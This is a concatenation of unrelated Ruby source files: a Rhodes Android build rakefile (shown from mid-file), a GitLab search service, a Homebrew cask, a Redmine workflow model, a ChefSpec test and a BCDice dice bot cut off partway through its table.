"-I\"#{$std_includes}\"" unless $std_includes.nil? args << "-D__SGI_STL_INTERNAL_PAIR_H" if USE_OWN_STLPORT args << "-D__NEW__" if USE_OWN_STLPORT args << "-I\"#{$stlport_includes}\"" if USE_OWN_STLPORT sources = get_sources sourcelist cc_build sources, objdir, args or exit 1 deps = [] $libname.each do |k, v| deps << v end args = [] args << "-L\"#{$rhobindir}/#{$confdir}\"" args << "-L\"#{libdir}\"" rlibs = [] rlibs << "log" rlibs << "dl" rlibs << "z" rlibs.map! { |x| "-l#{x}" } elibs = [] extlibs = Dir.glob($app_builddir + "/**/lib*.a") # + Dir.glob($app_builddir + "/**/lib*.so") extlibs.each do |lib| args << "-L\"#{File.dirname(lib)}\"" end stub = [] extlibs.reverse.each do |f| lparam = "-l" + File.basename(f).gsub(/^lib/, "").gsub(/\.(a|so)$/, "") elibs << lparam # Workaround for GNU ld: this way we have specified one lib multiple times # command line so ld's dependency mechanism will find required functions # independently of its position in command line stub.each do |s| args << s end stub << lparam end args += elibs args += elibs args += rlibs objects = get_objects sources, objdir #mkdir_p File.dirname(libname) unless File.directory? File.dirname(libname) cc_link libname, objects.collect { |x| '"'+x+'"' }, args, deps+extlibs or exit 1 destdir = File.join($androidpath, "Rhodes", "libs", "armeabi") mkdir_p destdir unless File.exists? destdir cp_r libname, destdir cc_run($stripbin, ['"'+File.join(destdir, File.basename(libname))+'"']) end task :manifest => ["config:android", :extensions] do version = {'major' => 0, 'minor' => 0, 'patch' => 0, "build" => 0} if $app_config["version"] if $app_config["version"] =~ /^(\d+)$/ version["major"] = $1.to_i elsif $app_config["version"] =~ /^(\d+)\.(\d+)$/ version["major"] = $1.to_i version["minor"] = $2.to_i elsif $app_config["version"] =~ /^(\d+)\.(\d+)\.(\d+)$/ version["major"] = $1.to_i version["minor"] = $2.to_i version["patch"] = $3.to_i elsif $app_config["version"] =~ /^(\d+)\.(\d+)\.(\d+)\.(\d+)$/ version["major"] = $1.to_i version["minor"] = $2.to_i version["patch"] = $3.to_i version["build"] = $4.to_i else raise "Version number must be numeric and in one of these formats: major, major.minor, major.minor.patch, or major.minor.patch.build." end end version = version["major"]*1000000 + version["minor"]*10000 + version["patch"]*100 + version["build"] usesPermissions = ['android.permission.INTERNET', 'android.permission.PERSISTENT_ACTIVITY', 'android.permission.WAKE_LOCK'] $app_config["capabilities"].each do |cap| cap = ANDROID_PERMISSIONS[cap] next if cap.nil? cap = [cap] unless cap.is_a? Array cap.each do |cap_item| if cap_item.is_a? Proc #caps_proc << cap_item next end if cap_item.is_a? String usesPermissions << "android.permission.#{cap_item}" next end end end usesPermissions.uniq! hidden = get_boolean($app_config['hidden_app']) generator = ManifestGenerator.new JAVA_PACKAGE_NAME, $app_package_name, hidden, usesPermissions generator.versionName = $app_config["version"] generator.versionCode = version generator.installLocation = 'auto' generator.minSdkVer = $min_sdk_level generator.maxSdkVer = $max_sdk_level generator.screenOrientation = $android_orientation unless $android_orientation.nil? generator.hardwareAcceleration = true if $app_config["capabilities"].index('hardware_acceleration') generator.apikey = $gapikey if $gapikey generator.addUriParams $uri_scheme, $uri_host, $uri_path_prefix Dir.glob(File.join($app_builddir, 'extensions', '*', 'adds', 'AndroidManifest.rb')).each do |extscript| puts "Evaluating #{extscript}" eval(File.new(extscript).read) end Dir.glob(File.join($app_builddir, 'extensions', '*', 'adds', 'Manifest*.erb')).each do |exttemplate| puts "Adding template #{exttemplate}" generator.manifestManifestAdds << exttemplate end Dir.glob(File.join($app_builddir, 'extensions', '*', 'adds', 'Application*.erb')).each do |exttemplate| puts "Adding template #{exttemplate}" generator.applicationManifestAdds << exttemplate end manifest = generator.render $rhomanifesterb File.open($appmanifest, "w") { |f| f.write manifest } ####################################################### # Deprecated staff below app_f = File.new($appmanifest) manifest_orig_doc = REXML::Document.new(app_f) app_f.close dst_manifest = manifest_orig_doc.elements["manifest"] dst_application = manifest_orig_doc.elements["manifest/application"] dst_main_activity = nil puts '$$$ try to found MainActivity' dst_application.elements.each("activity") do |a| puts '$$$ activity with attr = '+a.attribute('name', 'android').to_s if a.attribute('name', 'android').to_s == 'com.rhomobile.rhodes.RhodesActivity' puts ' $$$ FOUND !' dst_main_activity = a end end Dir.glob(File.join($app_builddir, 'extensions', '*', 'adds', 'AndroidManifest.xml')).each do |ext_manifest| if File.exists? ext_manifest puts 'AndroidManifest.xml['+ext_manifest+'] from native extension found !' manifest_ext_doc = REXML::Document.new(File.new(ext_manifest)) src_manifest = manifest_ext_doc.elements["manifest"] src_application = manifest_ext_doc.elements["manifest/application"] if src_application != nil puts 'Extension Manifest process application item :' src_application.elements.each do |e| puts '$$$ process element with attr = '+e.attribute('name', 'android').to_s if e.attribute('name', 'android').to_s == 'com.rhomobile.rhodes.RhodesActivity' e.elements.each do |sube| puts ' add item to MainActivity['+sube.xpath+']' dst_main_activity.add sube end else puts ' add item ['+e.xpath+']' dst_application.add e end end end puts 'Extension Manifest process root <manifest> item :' src_manifest.elements.each do |e| p = e.xpath if p != '/manifest/application' dst_e = manifest_orig_doc.elements[p] if dst_e != nil if p == '/manifest/uses-sdk' puts ' found and delete original item ['+p+']' manifest_orig_doc.elements.delete p end end puts ' and new item ['+p+']' dst_manifest.add e end end else puts 'AndroidManifest change file ['+m+'] from native extension not found !' end end puts 'delete original manifest' File.delete($appmanifest) updated_f = File.open($appmanifest, "w") manifest_orig_doc.write updated_f, 2 updated_f.close #rm tappmanifest puts 'Manifest updated by extension is saved!' end task :resources => [:rhobundle, :extensions, :librhodes] do set_app_name_android($appname) puts 'EXT: add additional files to project before build' Dir.glob(File.join($app_builddir, 'extensions', '*', 'adds', '*')).each do |res| if File.directory?(res) && (res != '.') && (res != '..') puts "add resources from extension [#{res}] to [#{$tmpdir}]" cp_r res, $tmpdir end end #copy icon after extension resources in case it overwrites them (like rhoelementsext...) set_app_icon_android if $config_xml puts "Copying custom config.xml" rawres_path = File.join($tmpdir, 'res', 'raw') mkdir_p rawres_path unless File.exist? rawres_path cp $config_xml, File.join(rawres_path, 'config.xml') end mkdir_p File.join($applibs) # Add .so libraries Dir.glob($app_builddir + "/**/lib*.so").each do |lib| cp_r lib, $applibs end $ext_android_additional_lib.each do |lib| cp_r lib, $applibs end # Dir.glob($tmpdir + "/lib/armeabi/lib*.so").each do |lib| # cc_run($stripbin, ['"'+lib+'"']) # end end task :fulleclipsebundle => [:resources, :librhodes] do #manifest = File.join $tmpdir,'AndroidManifest.xml' eclipse_res = File.join $projectpath,'res' eclipse_assets = File.join $projectpath,'assets' eclipse_libs = File.join $projectpath,'libs' #eclipse_manifest = File.join $projectpath,'AndroidManifest.xml' rm_rf eclipse_res rm_rf eclipse_assets rm_rf eclipse_libs #rm_rf eclipse_manifest mkdir_p eclipse_libs cp_r $appres, $projectpath cp_r $appassets, $projectpath cp_r $applibs, eclipse_libs #cp manifest, $projectpath end task :gencapabilitiesjava => "config:android" do # Generate Capabilities.java mkdir_p File.dirname $app_capabilities_java f = StringIO.new("", "w+") #File.open($app_capabilities_java, "w") do |f| f.puts "package #{JAVA_PACKAGE_NAME};" f.puts "public class Capabilities {" ANDROID_PERMISSIONS.keys.sort.each do |k| val = 'false' val = 'true' if $app_config["capabilities"].index(k) != nil f.puts " public static final boolean #{k.upcase}_ENABLED = #{val};" end f.puts "}" #end Jake.modify_file_if_content_changed($app_capabilities_java, f) end task :genpushjava => "config:android" do # Generate Push.java mkdir_p File.dirname $app_push_java f = StringIO.new("", "w+") #File.open($app_push_java, "w") do |f| f.puts "package #{JAVA_PACKAGE_NAME};" f.puts "public class Push {" f.puts " public static final String SENDER = \"#{$push_sender}\";" if $push_notifications.nil? f.puts " public static final String PUSH_NOTIFICATIONS = \"none\";" else f.puts " public static final String PUSH_NOTIFICATIONS = \"#{$push_notifications}\";" end f.puts "};" #end Jake.modify_file_if_content_changed($app_push_java, f) end task :genloadlibsjava => "config:android" do mkdir_p File.dirname $app_native_libs_java f = StringIO.new("", "w+") #File.open($app_native_libs_java, "w") do |f| f.puts "package #{JAVA_PACKAGE_NAME};" f.puts "public class NativeLibraries {" f.puts " public static void load() {" f.puts " // Load native .so libraries" Dir.glob($app_builddir + "/**/lib*.so").reverse.each do |lib| next if lib =~ /noautoload/ libname = File.basename(lib).gsub(/^lib/, '').gsub(/\.so$/, '') f.puts " System.loadLibrary(\"#{libname}\");" end #f.puts " // Load native implementation of rhodes" #f.puts " System.loadLibrary(\"rhodes\");" f.puts " }" f.puts "};" #end Jake.modify_file_if_content_changed($app_native_libs_java, f) end task :genrholisteners => ['config:android:extensions', 'config:android'] do # RhodesActivity Listeners mkdir_p File.dirname $app_startup_listeners_java f = StringIO.new("", "w+") f.puts '// WARNING! THIS FILE IS GENERATED AUTOMATICALLY! DO NOT EDIT IT MANUALLY!' f.puts 'package com.rhomobile.rhodes.extmanager;' f.puts '' f.puts 'class RhodesStartupListeners {' f.puts '' f.puts ' public static final String[] ourRunnableList = { ""' $ext_android_rhodes_activity_listener.each do |a| f.puts ' ,"'+a+'"' end f.puts ' };' f.puts '}' Jake.modify_file_if_content_changed($app_startup_listeners_java, f) end task :genrjava => [:manifest, :resources] do mkdir_p $app_rjava_dir puts "Generate initial R.java at #{$app_rjava_dir} >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>" args = ["package", "-f", "-M", $appmanifest, "-S", $appres, "-A", $appassets, "-I", $androidjar, "-J", $app_rjava_dir] Jake.run($aapt, args) raise 'Error in AAPT: R.java' unless $?.success? #buf = File.new($rho_android_r, "r").read.gsub(/^\s*import com\.rhomobile\..*\.R;\s*$/, "\nimport #{$app_package_name}.R;\n") #File.open($app_android_r, "w") { |f| f.write(buf) } mkdir_p File.join($app_rjava_dir, "R") if not File.exists? File.join($app_rjava_dir, "R") buf = File.new(File.join($app_rjava_dir, "R.java"), "r").read.gsub(/^\s*package\s*#{$app_package_name};\s*$/, "\npackage com.rhomobile.rhodes;\n") #buf.gsub!(/public\s*static\s*final\s*int/, "public static int") File.open(File.join($app_rjava_dir, "R", "R.java"), "w") { |f| f.write(buf) } $ext_android_library_deps.each do |package, path| r_dir = File.join $tmpdir, 'gen', package.split('.') mkdir_p r_dir buf = File.new(File.join($app_rjava_dir, 'R.java'), "r").read.gsub(/^\s*package\s*#{$app_package_name};\s*$/, "\npackage #{package};\n") File.open(File.join(r_dir,'R.java'), 'w') { |f| f.write(buf) } end end task :genreclipse => [:manifest, :resources] do mkdir_p $app_rjava_dir args = ["package", "-f", "-M", $appmanifest, "-S", $appres, "-A", $appassets, "-I", $androidjar, "-J", $app_rjava_dir] Jake.run($aapt, args) raise 'Error in AAPT: R.java' unless $?.success? Dir.glob(File.join $app_rjava_dir, '*.java') do |java| buf = File.new(java, 'r').read.gsub(/package .*$/, 'package com.rhomobile.rhodes;') File.open(java, 'w') { |f| f.write buf } end #buf = File.new($rho_android_r, "r").read.gsub(/^\s*import com\.rhomobile\..*\.R;\s*$/, "\nimport #{$app_package_name}.R;\n") #File.open($app_android_r, "w") { |f| f.write(buf) } #mkdir_p File.join($app_rjava_dir, "R") if not File.exists? File.join($app_rjava_dir, "R") #buf = File.new(File.join($app_rjava_dir, "R.java"), "r").read.gsub(/^\s*package\s*#{$app_package_name};\s*$/, "\npackage com.rhomobile.rhodes.R;\n") #"{b}"uf.gsub!(/public\s*static\s*final\s*int/, "public static int") #File.open(File.join($app_rjava_dir, "R", "R.java"), "w") { |f| f.write(buf) } end task :gensourceseclipse => [:genloadlibsjava, :genpushjava, :gencapabilitiesjava, :genrholisteners, :genreclipse] task :gensourcesjava => [:genloadlibsjava, :genpushjava, :gencapabilitiesjava, :genrholisteners, :genrjava] #desc "Build Rhodes for android" task :rhodes => [:rhobundle, :librhodes, :manifest, :resources, :gensourcesjava] do rm_rf $tmpdir + "/Rhodes" mkdir_p $tmpdir + "/Rhodes" srclist = File.join($builddir, "RhodesSRC_build.files") newsrclist = File.join($tmpdir, "RhodesSRC_build.files") lines = [] File.open(srclist, "r") do |f| while line = f.gets line.chomp! next if line =~ /\/AndroidR\.java\s*$/ lines << line end end Dir.glob(File.join($tmpdir,'gen','**','*.java')) do |filepath| lines << "\"#{filepath}\"" end #lines << "\"" +File.join($app_rjava_dir, "R.java")+"\"" #lines << "\"" +File.join($app_rjava_dir, "R", "R.java")+"\"" #lines << "\"" +$app_native_libs_java+"\"" #lines << "\"" +$app_capabilities_java+"\"" #lines << "\"" +$app_push_java+"\"" #lines << "\"" +$app_startup_listeners_java+"\"" File.open(newsrclist, "w") { |f| f.write lines.join("\n") } srclist = newsrclist classpath = $androidjar classpath += $path_separator + $google_classpath if $google_classpath classpath += $path_separator + $motosol_classpath if $motosol_classpath classpath += $path_separator + File.join($tmpdir, 'Rhodes') javafilelists = [srclist] extlist = File.join $app_builddir, "ext_build.files" if File.exists? extlist puts "#{extlist} is found! THere are addditional java files" javafilelists << extlist end java_compile(File.join($tmpdir, 'Rhodes'), classpath, javafilelists) files = [] Dir.glob(File.join($tmpdir, "Rhodes", "*")).each do |f| relpath = Pathname.new(f).relative_path_from(Pathname.new(File.join($tmpdir, "Rhodes"))).to_s files << relpath end unless files.empty? jar = File.join($app_builddir, 'librhodes', 'Rhodes.jar') args = ["cf", jar] args += files Jake.run($jarbin, args, File.join($tmpdir, "Rhodes")) unless $?.success? raise "Error creating #{jar}" end $android_jars = [jar] end end task :extensions_java => [:rhodes, :extensions] do puts 'Compile additional java files:' classpath = $androidjar classpath += $path_separator + $google_classpath if $google_classpath classpath += $path_separator + $motosol_classpath if $motosol_classpath classpath += $path_separator + File.join($tmpdir, 'Rhodes') Dir.glob(File.join($app_builddir, '**', '*.jar')).each do |jar| classpath += $path_separator + jar end $ext_android_additional_sources.each do |extpath, list| ext = File.basename(extpath) puts "Compiling '#{ext}' extension java sources: #{list}" srclist = Tempfile.new "#{ext}SRC_build" lines = [] File.open(list, "r") do |f| while line = f.gets line.chomp! srclist.write "\"#{File.join(extpath, line)}\"\n" #srclist.write "#{line}\n" end end srclist.close mkdir_p File.join($tmpdir, ext) java_compile(File.join($tmpdir, ext), classpath, [srclist.path]) extjar = File.join $app_builddir, 'extensions', ext, ext + '.jar' args = ["cf", extjar, '.'] Jake.run($jarbin, args, File.join($tmpdir, ext)) unless $?.success? raise "Error creating #{extjar}" end $android_jars << extjar classpath += $path_separator + extjar end end task :upgrade_package => :rhobundle do #puts '$$$$$$$$$$$$$$$$$$' #puts 'targetdir = '+$targetdir.to_s #puts 'bindir = '+$bindir.to_s android_targetdir = $targetdir #File.join($targetdir, 'android') mkdir_p android_targetdir if not File.exists? android_targetdir zip_file_path = File.join(android_targetdir, 'upgrade_bundle.zip') Jake.build_file_map(File.join($srcdir, "apps"), "rhofilelist.txt") Jake.zip_upgrade_bundle($bindir, zip_file_path) end task :upgrade_package_partial => ["build:android:rhobundle"] do #puts '$$$$$$$$$$$$$$$$$$' #puts 'targetdir = '+$targetdir.to_s #puts 'bindir = '+$bindir.to_s # process partial update add_list_full_name = File.join($app_path, 'upgrade_package_add_files.txt') remove_list_full_name = File.join($app_path, 'upgrade_package_remove_files.txt') src_folder = File.join($bindir, 'RhoBundle') src_folder = File.join(src_folder, 'apps') tmp_folder = $bindir + '_tmp_partial' rm_rf tmp_folder if File.exists? tmp_folder mkdir_p tmp_folder dst_tmp_folder = File.join(tmp_folder, 'RhoBundle') mkdir_p dst_tmp_folder # copy all cp_r src_folder, dst_tmp_folder dst_tmp_folder = File.join(dst_tmp_folder, 'apps') mkdir_p dst_tmp_folder add_files = [] if File.exists? add_list_full_name File.open(add_list_full_name, "r") do |f| while line = f.gets fixed_path = line.gsub('.rb', '.iseq').gsub('.erb', '_erb.iseq').chop add_files << fixed_path puts '### ['+fixed_path+']' end end end remove_files = [] if File.exists? remove_list_full_name File.open(remove_list_full_name, "r") do |f| while line = f.gets fixed_path = line.gsub('.rb', '.iseq').gsub('.erb', '_erb.iseq').chop remove_files << fixed_path #puts '### ['+fixed_path+']' end end end psize = dst_tmp_folder.size+1 Dir.glob(File.join(dst_tmp_folder, '**/*')).sort.each do |f| relpath = f[psize..-1] if File.file?(f) #puts '$$$ ['+relpath+']' if not add_files.include?(relpath) rm_rf f end end end Jake.build_file_map(dst_tmp_folder, "upgrade_package_add_files.txt") #if File.exists? add_list_full_name # File.open(File.join(dst_tmp_folder, 'upgrade_package_add_files.txt'), "w") do |f| # add_files.each do |j| # f.puts "#{j}\tfile\t0\t0" # end # end #end if File.exists? remove_list_full_name File.open(File.join(dst_tmp_folder, 'upgrade_package_remove_files.txt'), "w") do |f| remove_files.each do |j| f.puts "#{j}" #f.puts "#{j}\tfile\t0\t0" end end end mkdir_p $targetdir if not File.exists? $targetdir zip_file_path = File.join($targetdir, "upgrade_bundle_partial.zip") Jake.zip_upgrade_bundle(tmp_folder, zip_file_path) rm_rf tmp_folder end #desc "build all" task :all => [:rhobundle, :rhodes, :extensions_java] end end namespace "package" do task :android => "build:android:all" do puts "Running dx utility" args = [] args << "-Xmx1024m" args << "-jar" args << $dxjar args << "--dex" args << "--output=#{$bindir}/classes.dex" Dir.glob(File.join($app_builddir, '**', '*.jar')).each do |jar| args << jar end Jake.run(File.join($java, 'java'+$exe_ext), args) unless $?.success? raise "Error running DX utility" end resourcepkg = $bindir + "/rhodes.ap_" puts "Packaging Assets and Jars" # this task already caaled during build "build:android:all" #set_app_name_android($appname) args = ["package", "-f", "-M", $appmanifest, "-S", $appres, "-A", $appassets, "-I", $androidjar, "-F", resourcepkg] Jake.run($aapt, args) unless $?.success? raise "Error running AAPT (1)" end # Workaround: manually add files starting with '_' because aapt silently ignore such files when creating package Dir.glob(File.join($appassets, "**/*")).each do |f| next unless File.basename(f) =~ /^_/ relpath = Pathname.new(f).relative_path_from(Pathname.new($tmpdir)).to_s puts "Add #{relpath} to #{resourcepkg}..." args = ["uf", resourcepkg, relpath] Jake.run($jarbin, args, $tmpdir) unless $?.success? raise "Error packaging assets" end end puts "Packaging Native Libs" args = ["uf", resourcepkg] Dir.glob(File.join($applibs, "lib*.so")).each do |lib| cc_run($stripbin, ['"'+lib+'"']) args << "lib/armeabi/#{File.basename(lib)}" end Jake.run($jarbin, args, $tmpdir) unless $?.success? raise "Error packaging native libraries" end end end namespace "device" do namespace "android" do desc "Build debug self signed for device" task :debug => "package:android" do dexfile = $bindir + "/classes.dex" simple_apkfile = $targetdir + "/" + $appname + "-tmp.apk" final_apkfile = $targetdir + "/" + $appname + "-debug.apk" resourcepkg = $bindir + "/rhodes.ap_" apk_build $androidsdkpath, simple_apkfile, resourcepkg, dexfile, true puts "Align Debug APK file" args = [] args << "-f" args << "-v" args << "4" args << simple_apkfile args << final_apkfile out = Jake.run2($zipalign, args, :hide_output => true) puts out if USE_TRACES unless $?.success? puts "Error running zipalign" exit 1 end #remove temporary files rm_rf simple_apkfile File.open(File.join(File.dirname(final_apkfile), "app_info.txt"), "w") do |f| f.puts $app_package_name end end task :install => :debug do apkfile = $targetdir + "/" + $appname + "-debug.apk" Jake.run $adb, ['-d', 'wait-for-device'] puts "Install APK file" Jake.run($adb, ["-d", "install", "-r", apkfile]) unless $?.success? raise "Error installing APK file" end puts "Install complete" end desc "Build production signed for device" task :production => "package:android" do dexfile = $bindir + "/classes.dex" simple_apkfile = $targetdir + "/" + $appname + "_tmp.apk" final_apkfile = $targetdir + "/" + $appname + "_signed.apk" signed_apkfile = $targetdir + "/" + $appname + "_tmp_signed.apk" resourcepkg = $bindir + "/rhodes.ap_" apk_build $androidsdkpath, simple_apkfile, resourcepkg, dexfile, false if not File.exists? $keystore puts "Generating private keystore..." mkdir_p File.dirname($keystore) unless File.directory? File.dirname($keystore) args = [] args << "-genkey" args << "-alias" args << $storealias args << "-keyalg" args << "RSA" args << "-validity" args << "20000" args << "-keystore" args << $keystore args << "-storepass" args << $storepass args << "-keypass" args << $keypass Jake.run($keytool, args) unless $?.success? puts "Error generating keystore file" exit 1 end end puts "Signing APK file" args = [] args << "-sigalg" args << "MD5withRSA" args << "-digestalg" args << "SHA1" args << "-verbose" args << "-keystore" args << $keystore args << "-storepass" args << $storepass args << "-signedjar" args << signed_apkfile args << simple_apkfile args << $storealias Jake.run($jarsigner, args) unless $?.success? puts "Error running jarsigner" exit 1 end puts "Align APK file" args = [] args << "-f" args << "-v" args << "4" args << '"' + signed_apkfile + '"' args << '"' + final_apkfile + '"' Jake.run($zipalign, args) unless $?.success? puts "Error running zipalign" exit 1 end #remove temporary files rm_rf simple_apkfile rm_rf signed_apkfile File.open(File.join(File.dirname(final_apkfile), "app_info.txt"), "w") do |f| f.puts $app_package_name end end #task :getlog => "config:android" do # AndroidTools.get_app_log($appname, true) or exit 1 #end end end #namespace "emulator" do # namespace "android" do # task :getlog => "config:android" do # AndroidTools.get_app_log($appname, false) or exit 1 # end # end #end def run_as_spec(device_flag) Rake::Task["device:android:debug"].invoke if device_flag == '-e' Rake::Task["config:android:emulator"].invoke else Rake::Task["config:android:device"].invoke end log_name = $app_path + '/RhoLogSpec.txt' File.delete(log_name) if File.exist?(log_name) AndroidTools.logclear(device_flag) AndroidTools.run_emulator(:hidden => true) if device_flag == '-e' do_uninstall(device_flag) # Failsafe to prevent eternal hangs Thread.new { sleep 2000 if device_flag == '-e' AndroidTools.kill_adb_and_emulator else AndroidTools.kill_adb_logcat device_flag, log_name end } apkfile = File.expand_path(File.join $targetdir, $appname + "-debug.apk") AndroidTools.load_app_and_run(device_flag, apkfile, $app_package_name) AndroidTools.logcat(device_flag, log_name) Jake.before_run_spec start = Time.now puts "Waiting for application ..." for i in 0..60 if AndroidTools.application_running(device_flag, $app_package_name) break else sleep(1) end end puts "Waiting for log file: #{log_name}" for i in 0..120 if !File.exist?(log_name) sleep(1) else break end end if !File.exist?(log_name) puts "Can not read log file: " + log_name exit(1) end puts "Start reading log ..." io = File.new(log_name, 'r:UTF-8') end_spec = false while !end_spec do io.each do |line| if line.class.method_defined? "valid_encoding?" end_spec = !Jake.process_spec_output(line) if line.valid_encoding? else end_spec = !Jake.process_spec_output(line) end break if end_spec end break unless AndroidTools.application_running(device_flag, $app_package_name) sleep(5) unless end_spec end io.close puts "Processing spec results ..." Jake.process_spec_results(start) # stop app do_uninstall(device_flag) if device_flag == '-e' AndroidTools.kill_adb_and_emulator else AndroidTools.kill_adb_logcat(device_flag, log_name) end $stdout.flush end namespace "run" do namespace "android" do namespace "emulator" do task :spec do Jake.decorate_spec {run_as_spec '-e'} end end namespace "device" do task :spec do Jake.decorate_spec {run_as_spec '-d'} end end task :spec => "run:android:emulator:spec" do end task :get_log => "config:android" do puts "log_file=" + $applog_path end task :emulator => ['config:android:emulator', 'device:android:debug'] do AndroidTools.kill_adb_logcat('-e') AndroidTools.run_emulator apkfile = File.expand_path(File.join $targetdir, $appname + "-debug.apk") AndroidTools.load_app_and_run('-e', apkfile, $app_package_name) AndroidTools.logcat_process('-e') end desc "Run application on RhoSimulator" task :rhosimulator => ["config:set_android_platform", "config:common"] do $emuversion = $app_config["android"]["version"] unless $app_config["android"].nil? $emuversion = $config["android"]["version"] if $emuversion.nil? and !$config["android"].nil? $rhosim_config = "platform='android'\r\n" $rhosim_config += "os_version='#{$emuversion}'\r\n" if $emuversion Rake::Task["run:rhosimulator"].invoke end task :rhosimulator_debug => ["config:set_android_platform", "config:common"] do $emuversion = $app_config["android"]["version"] unless $app_config["android"].nil? $emuversion = $config["android"]["version"] if $emuversion.nil? and !$config["android"].nil? $rhosim_config = "platform='android'\r\n" $rhosim_config += "os_version='#{$emuversion}'\r\n" if $emuversion Rake::Task["run:rhosimulator_debug"].invoke end desc "build and install on device" task :device => "device:android:debug" do AndroidTools.kill_adb_logcat('-d') apkfile = File.join $targetdir, $appname + "-debug.apk" AndroidTools.load_app_and_run('-d', apkfile, $app_package_name) AndroidTools.logcat_process('-d') end end desc "build and launch emulator" task :android => "run:android:emulator" do end end namespace "uninstall" do def do_uninstall(flag) args = [] args << flag args << "uninstall" args << $app_package_name for i in 0..20 result = Jake.run($adb, args) unless $?.success? puts "Error uninstalling application" exit 1 end if result.include?("Success") puts "Application uninstalled successfully" break else if result.include?("Failure") puts "Application is not installed on the device" break else puts "Error uninstalling application" exit 1 if i == 20 end end sleep(5) end end namespace "android" do task :emulator => "config:android" do unless AndroidTools.is_emulator_running puts "WARNING!!! Emulator is not up and running" exit 1 end do_uninstall('-e') end desc "uninstall from device" task :device => "config:android" do unless AndroidTools.is_device_running puts "WARNING!!! Device is not connected" exit 1 end do_uninstall('-d') end end desc "uninstall from emulator" task :android => "uninstall:android:emulator" do end end namespace "clean" do desc "Clean Android" task :android => ["clean:android:all", "clean:common"] namespace "android" do task :files => "config:android" do rm_rf $targetdir rm_rf $app_builddir Dir.glob(File.join($bindir, "*.*")) { |f| rm f, :force => true } rm_rf $srcdir rm_rf $tmpdir end task :all => :files end end namespace :stop do namespace :android do task :emulator do AndroidTools.kill_adb_and_emulator end end end
module Search class GlobalService attr_accessor :current_user, :params def initialize(user, params) @current_user, @params = user, params.dup end def execute group = Group.find_by(id: params[:group_id]) if params[:group_id].present? projects = ProjectsFinder.new.execute(current_user) projects = projects.in_namespace(group.id) if group project_ids = projects.pluck(:id) Gitlab::SearchResults.new(project_ids, params[:search]) end end end
cask "patchwork" do version "3.18.1" sha256 "2436dc487afb45264e81c5b1d65cb4acc7ec8d772ce2af2132122f86ca6d887c" url "https://github.com/ssbc/patchwork/releases/download/v#{version}/Patchwork-#{version}.dmg" name "Patchwork" homepage "https://github.com/ssbc/patchwork" app "Patchwork.app" end
# Redmine - project management software # Copyright (C) 2006-2014 Jean-Philippe Lang # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; either version 2 # of the License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. class WorkflowPermission < WorkflowRule validates_inclusion_of :rule, :in => %w(readonly required) validate :validate_field_name # Returns the workflow permissions for the given trackers and roles # grouped by status_id # # Example: # WorkflowPermission.rules_by_status_id trackers, roles # # => {1 => {'start_date' => 'required', 'due_date' => 'readonly'}} def self.rules_by_status_id(trackers, roles) WorkflowPermission.where(:tracker_id => trackers.map(&:id), :role_id => roles.map(&:id)).inject({}) do |h, w| h[w.old_status_id] ||= {} h[w.old_status_id][w.field_name] ||= [] h[w.old_status_id][w.field_name] << w.rule h end end # Replaces the workflow permissions for the given trackers and roles # # Example: # WorkflowPermission.replace_permissions trackers, roles, {'1' => {'start_date' => 'required', 'due_date' => 'readonly'}} def self.replace_permissions(trackers, roles, permissions) trackers = Array.wrap trackers roles = Array.wrap roles transaction do permissions.each { |status_id, rule_by_field| rule_by_field.each { |field, rule| destroy_all(:tracker_id => trackers.map(&:id), :role_id => roles.map(&:id), :old_status_id => status_id, :field_name => field) if rule.present? trackers.each do |tracker| roles.each do |role| WorkflowPermission.create(:role_id => role.id, :tracker_id => tracker.id, :old_status_id => status_id, :field_name => field, :rule => rule) end end end } } end end protected def validate_field_name unless Tracker::CORE_FIELDS_ALL.include?(field_name) || field_name.to_s.match(/^\d+$/) errors.add :field_name, :invalid end end end
# Copyright 2015 Nordstrom, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. RSpec.describe 'chef_vault_try_notify::default' do let(:chef_run) { ChefSpec::SoloRunner.new.converge(described_recipe) } it 'converges successfully' do expect(chef_run).to include_recipe(described_recipe) end it 'include the chef-vault recipe' do expect(chef_run).to include_recipe('chef-vault::default') end it 'adds the vault_available? helper to recipes' do recipe = Chef::Recipe.new( 'chef_vault_try_notify', 'default', chef_run.run_context ) expect(recipe).to respond_to(:vault_available?) end end
# frozen_string_literal: true require "bcdice/dice_table/table" require "bcdice/dice_table/d66_grid_table" require "bcdice/arithmetic" module BCDice module GameSystem class AngelGear < Base # ゲームシステムの識別子 ID = 'AngelGear' # ゲームシステム名 NAME = 'エンゼルギア 天使大戦TRPG The 2nd Editon' # ゲームシステム名の読みがな SORT_KEY = 'えんせるきあ2' # ダイスボットの使い方 HELP_MESSAGE = <<~MESSAGETEXT ・判定 nAG[s][±a] []内は省略可能。 n:判定値 s:技能値 a:修正 (例) 12AG 10AG3±20 ・感情表 ET MESSAGETEXT def initialize(command) super(command) @sort_barabara_dice = true # バラバラロール(Bコマンド)でソート有 end def eval_game_system_specific_command(command) if (m = /^(\d+)AG(\d+)?(([+\-]\d+)*)$/.match(command)) resolute_action(m[1].to_i, m[2]&.to_i, m[3], command) else roll_tables(command, TABLES) end end def resolute_action(num_dice, skill_value, modify, command) dice = @randomizer.roll_barabara(num_dice, 6).sort dice_text = dice.join(",") modify_n = 0 success = 0 if skill_value success = dice.count { |val| val <= skill_value } modify_n = Arithmetic.eval(modify, RoundType::FLOOR) unless modify.empty? end gospel = '(福音発生)' if success + modify_n >= 100 output = "(#{command}) > #{success}[#{dice_text}]#{format('%+d', modify_n)} > 成功数: #{success + modify_n}#{gospel}" if success + modify_n >= 100 Result.critical(output) elsif 0 < success + modify_n Result.success(output) else Result.failure(output) end end TABLES = { 'ET' => DiceTable::D66GridTable.new( '感情表', [ [ '好奇心(好奇心)', '憧れ(あこがれ)', '尊敬(そんけい)', 